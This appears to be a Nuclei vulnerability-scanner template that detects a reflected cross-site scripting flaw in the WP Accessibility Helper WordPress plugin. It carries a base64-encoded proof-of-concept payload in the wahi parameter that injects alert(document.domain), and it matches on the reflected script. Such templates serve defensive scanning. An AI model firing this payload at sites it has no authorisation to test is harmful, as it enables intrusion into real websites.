id: accessibility-helper-xss

info:
  name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
  author: dhiyaneshDK
  severity: medium
  description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
  reference: https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
  tags: xss,wordpress,wp-plugin,wp

requests:
  - method: GET
    path:
      - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "var wah_target_src = '';alert(document.domain);//';"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200